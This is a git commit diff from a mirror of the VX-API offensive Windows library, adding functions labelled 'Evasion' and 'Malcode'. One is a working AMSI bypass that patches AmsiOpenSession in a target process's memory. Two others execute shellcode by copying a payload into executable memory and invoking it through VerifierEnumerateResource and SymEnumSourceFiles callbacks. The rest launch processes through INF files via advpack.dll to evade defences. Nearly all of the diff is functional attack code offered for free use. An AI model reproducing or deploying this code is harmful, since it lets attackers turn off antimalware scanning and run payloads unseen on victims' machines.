mirror of https://github.com/vxunderground/VX-API
parent
9d8a2f2801
commit
08fc458393
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.642
|
||||
Version: 2.0.658
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -99,6 +99,10 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| RemoveRegisterDllNotification | Rad98, Peter Winter-Smith | Evasion |
|
||||
| CreateProcessByWindowsRHotKey | smelly__vx | Evasion |
|
||||
| CreateProcessByWindowsRHotKeyEx | smelly__vx | Evasion |
|
||||
| AmsiBypassViaPatternScan | ZeroMemoryEx | Evasion |
|
||||
| CopyFileViaSetupCopyFile | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSectionInstallStringNoCab | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSetupCommand | smelly__vx | Evasion |
|
||||
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
|
||||
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
|
||||
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
|
||||
|
@ -204,6 +208,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfSceViaClusWorkerCreate | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaSymEnumProcesses | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaImageGetDigestStream | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaVerifierEnumerateResource | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaSymEnumSourceFiles | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
|
|
|
@ -0,0 +1,70 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
typedef HRESULT(WINAPI* AMSIOPENSESSION)(HAMSICONTEXT, HAMSISESSION*);
|
||||
|
||||
BYTE AmsiPattern[] = { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33 };
|
||||
UCHAR AmsiPatch[] = { 0xeb };
|
||||
|
||||
ULONGLONG UnusedSubroutineSearchAmsiPattern(PBYTE Address, DWORD Size, PBYTE Pattern, DWORD PatternSize)
|
||||
{
|
||||
for (DWORD dwX = 0; dwX < 1024; dwX++)
|
||||
{
|
||||
if (Address[dwX] == Pattern[0])
|
||||
{
|
||||
DWORD dwOffset = 1;
|
||||
while (dwOffset < PatternSize && dwX + dwOffset < Size && (Pattern[dwOffset] == '?' || Address[dwX + dwOffset] == Pattern[dwOffset]))
|
||||
{
|
||||
dwOffset++;
|
||||
}
|
||||
|
||||
if (dwOffset == PatternSize)
|
||||
return (dwX + 3);
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId)
|
||||
{
|
||||
HANDLE hProcess = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
AMSIOPENSESSION pfnAmsiOpenSession = NULL;
|
||||
BYTE AmsiBuffer[1024] = { 0 };
|
||||
ULONGLONG AmsiAddress = 0LL, PatchedAmsiAddress = 0LL;
|
||||
|
||||
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
|
||||
if (hProcess == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"amsi.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
pfnAmsiOpenSession = (AMSIOPENSESSION)GetProcAddressA((DWORD64)hMod, "AmsiOpenSession");
|
||||
if (!pfnAmsiOpenSession)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadProcessMemory(hProcess, pfnAmsiOpenSession, &AmsiBuffer, 1024, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
AmsiAddress = UnusedSubroutineSearchAmsiPattern(AmsiBuffer, sizeof(AmsiBuffer), AmsiPattern, sizeof(AmsiPattern));
|
||||
if (AmsiAddress == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
PatchedAmsiAddress = (ULONGLONG)pfnAmsiOpenSession;
|
||||
PatchedAmsiAddress += AmsiAddress;
|
||||
|
||||
if (!WriteProcessMemory(hProcess, (LPVOID)PatchedAmsiAddress, AmsiPatch, 1, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hProcess)
|
||||
CloseHandle(hProcess);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
|
||||
{
|
||||
return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
|
||||
}
|
||||
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
|
||||
{
|
||||
WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
WCHAR wDestination[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(wSource, (PCHAR)Source, StringLengthA(Source) * sizeof(WCHAR)) == 0)
|
||||
return FALSE;
|
||||
|
||||
if (CharStringToWCharString(wDestination, (PCHAR)Destination, StringLengthA(Destination) * sizeof(WCHAR)) == 0)
|
||||
return FALSE;
|
||||
|
||||
return SetupDecompressOrCopyFileW(wSource, wDestination, FILE_COMPRESSION_NONE);
|
||||
}
|
||||
|
|
@ -0,0 +1,115 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
|
||||
Example .inf file
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
[version]
|
||||
signature = $Chicago$
|
||||
AdvancedInf = 2.5
|
||||
|
||||
[DefaultInstall_SingleUser]
|
||||
RunPostSetupCommands = Tag1
|
||||
|
||||
[Tag1]
|
||||
C:\Windows\system32\calc.exe
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
*/
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* LAUNCHINFSECTIONW)(HWND, HINSTANCE, PWSTR, INT);
|
||||
LAUNCHINFSECTIONW LaunchINFSectionW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WCHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchINFSectionW = (LAUNCHINFSECTIONW)GetProcAddressA((DWORD64)hMod, "LaunchINFSectionW");
|
||||
if (!LaunchINFSectionW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyW(InfExecutionBuffer, PathToInfFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, NameOfSection) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L"1") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(LaunchINFSectionW(NULL, NULL, InfExecutionBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* LAUNCHINFSECTION)(HWND, HINSTANCE, PSTR, INT);
|
||||
LAUNCHINFSECTION LaunchINFSection = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchINFSection = (LAUNCHINFSECTION)GetProcAddressA((DWORD64)hMod, "LaunchINFSection");
|
||||
if (!LaunchINFSection)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyA(InfExecutionBuffer, PathToInfFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, NameOfSection) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, "1") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(LaunchINFSection(NULL, NULL, InfExecutionBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,56 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#define RSC_FLAG_INF 1
|
||||
#define RSC_FLAG_QUIET 4
|
||||
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* RUNSETUPCOMMANDW)(HWND, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, PHANDLE, DWORD, LPVOID);
|
||||
RUNSETUPCOMMANDW RunSetupCommandW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
|
||||
RunSetupCommandW = (RUNSETUPCOMMANDW)GetProcAddressA((DWORD64)hMod, "RunSetupCommandW");
|
||||
if (!RunSetupCommandW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(RunSetupCommandW(NULL, PathToInfFile, NameOfSection, L".", NULL, NULL, RSC_FLAG_INF | RSC_FLAG_QUIET, NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* RUNSETUPCOMMANDA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, PHANDLE, DWORD, LPVOID);
|
||||
RUNSETUPCOMMANDA RunSetupCommandA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
|
||||
RunSetupCommandA = (RUNSETUPCOMMANDA)GetProcAddressA((DWORD64)hMod, "RunSetupCommandA");
|
||||
if (!RunSetupCommandA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(RunSetupCommandA(NULL, PathToInfFile, NameOfSection, ".", NULL, NULL, RSC_FLAG_INF | RSC_FLAG_QUIET, NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -79,4 +79,11 @@ typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
|||
/*******************************************
|
||||
ADVAPI32 IMPORT
|
||||
*******************************************/
|
||||
typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
||||
typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
||||
|
||||
|
||||
|
||||
///*******************************************
|
||||
// IMAGEHLP IMPORT
|
||||
//*******************************************/
|
||||
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
|
|
@ -65,6 +65,8 @@
|
|||
#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
|
||||
#define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004
|
||||
|
||||
#define CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO 0x04
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
|
|
|
@ -32,7 +32,7 @@ BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName)
|
|||
if (Buffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
|
||||
if (!ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
|
||||
|
@ -83,7 +83,7 @@ BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName)
|
|||
if (Buffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
|
||||
if (!ReadFile(hHandle, Buffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
|
||||
|
|
|
@ -2,20 +2,14 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
/*
|
||||
|
||||
This is stuff I was debugging.
|
||||
------------------------------------
|
||||
|
||||
DWORD dwSize = 0;
|
||||
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
MpfSceViaImageGetDigestStream((PBYTE)Buffer, dwSize);
|
||||
//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
|
||||
|
||||
------------------------------------
|
||||
*/
|
||||
|
||||
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
|
||||
|
||||
CreateProcessFromINFSectionInstallStringNoCabA("C:\\Users\\dwThr\\Desktop\\demo.inf", "DefaultInstall_SingleUser");
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
|
|
@ -21,4 +21,6 @@ BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
|||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeChooseColorWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -7,12 +7,22 @@ VOID InvokeImageGetDigestStreamCallbackRoutine(LPVOID lpParameter)
|
|||
WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\ntdll.dll";
|
||||
HANDLE hImage = NULL;
|
||||
HANDLE hDispose = NULL;
|
||||
IMAGEGETDIGESTSTREAM ImageGetDigestStream = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
|
||||
hMod = LoadLibraryW(L"Imagehlp.dll");
|
||||
if (hMod == NULL)
|
||||
return;
|
||||
|
||||
ImageGetDigestStream = (IMAGEGETDIGESTSTREAM)GetProcAddressA((DWORD64)hMod, "ImageGetDigestStream");
|
||||
if (!ImageGetDigestStream)
|
||||
return;
|
||||
|
||||
hImage = CreateFileW(DefaultBinaryPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hImage == INVALID_HANDLE_VALUE)
|
||||
return;
|
||||
|
||||
ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)lpParameter, &hDispose);
|
||||
ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, lpParameter, &hDispose);
|
||||
|
||||
if(hDispose)
|
||||
CloseHandle(hDispose);
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeSymEnumSourceFilesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, TRUE))
|
||||
return;
|
||||
|
||||
SymEnumSourceFilesW(GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
}
|
||||
|
||||
BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeSymEnumSourceFilesCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,37 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
VOID InvokeVerifierEnumerateResourceCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
typedef ULONG(NTAPI* AVRF_RESOURCE_ENUMERATE_CALLBACK)(PVOID ResourceDescription, PVOID EnumerationContext, PULONG EnumerationLevel);
|
||||
typedef ULONG(WINAPI* VERIFIERENUMERATERESOURCE)(HANDLE, ULONG, ULONG, AVRF_RESOURCE_ENUMERATE_CALLBACK, PVOID);
|
||||
VERIFIERENUMERATERESOURCE VerifierEnumerateResource = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
|
||||
hMod = LoadLibraryW(L"verifier.dll");
|
||||
if (hMod == NULL)
|
||||
return;
|
||||
|
||||
VerifierEnumerateResource = (VERIFIERENUMERATERESOURCE)GetProcAddressA((DWORD64)hMod, "VerifierEnumerateResource");
|
||||
if (!VerifierEnumerateResource)
|
||||
return;
|
||||
|
||||
VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL MpfSceViaVerifierEnumerateResource(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeVerifierEnumerateResourceCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -135,6 +135,7 @@
|
|||
<ClCompile Include="AdfCloseHandleOnInvalidAddress.cpp" />
|
||||
<ClCompile Include="AdfIsCreateProcessDebugEventCodeSet.cpp" />
|
||||
<ClCompile Include="AdfOpenProcessOnCsrss.cpp" />
|
||||
<ClCompile Include="AmsiBypassViaPatternScan.cpp" />
|
||||
<ClCompile Include="ByteArrayToCharArray.cpp" />
|
||||
<ClCompile Include="CaplockString.cpp" />
|
||||
<ClCompile Include="CharArrayToByteArray.cpp" />
|
||||
|
@ -144,6 +145,7 @@
|
|||
<ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp" />
|
||||
<ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp" />
|
||||
<ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp" />
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp" />
|
||||
<ClCompile Include="CopyMemoryEx.cpp" />
|
||||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp" />
|
||||
<ClCompile Include="CreateLocalAppDataObjectPath.cpp" />
|
||||
|
@ -152,6 +154,8 @@
|
|||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
|
||||
|
@ -303,6 +307,8 @@
|
|||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="MpfSceViaSymEnumProcesses.cpp" />
|
||||
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp" />
|
||||
<ClCompile Include="MpfSceViaVerifierEnumerateResource.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="ReadDataFromPeSection.cpp" />
|
||||
|
|
|
@ -753,6 +753,24 @@
|
|||
<ClCompile Include="MpfSceViaImageGetDigestStream.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="AmsiBypassViaPatternScan.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaVerifierEnumerateResource.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -3,8 +3,7 @@
|
|||
#include "StringManipulation.h"
|
||||
#include "FunctionDeclaration.h"
|
||||
#include <Ws2tcpip.h>
|
||||
#include <imagehlp.h>
|
||||
//#include <Dbghelp.h>
|
||||
#include <Dbghelp.h>
|
||||
#include <wincrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <Shlobj.h>
|
||||
|
@ -21,14 +20,15 @@
|
|||
#include <dpa_dsa.h>
|
||||
#include <winevt.h>
|
||||
#include <resapi.h>
|
||||
#include <amsi.h>
|
||||
#include <SetupAPI.h>
|
||||
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
#pragma comment(lib, "Iphlpapi.lib")
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
#pragma comment(lib, "Imagehlp.lib")
|
||||
//#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Wtsapi32.lib")
|
||||
#pragma comment(lib, "Urlmon.lib")
|
||||
#pragma comment(lib, "PowrProf.lib")
|
||||
|
@ -37,7 +37,7 @@
|
|||
#pragma comment(lib, "Comctl32.lib")
|
||||
#pragma comment(lib, "Wevtapi.lib")
|
||||
#pragma comment(lib, "ResUtils.lib")
|
||||
|
||||
#pragma comment(lib, "Setupapi.lib")
|
||||
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
|
@ -322,6 +322,8 @@ BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
|||
BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaVerifierEnumerateResource(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
|
||||
|
||||
|
||||
|
@ -355,6 +357,13 @@ DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
|
|||
DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue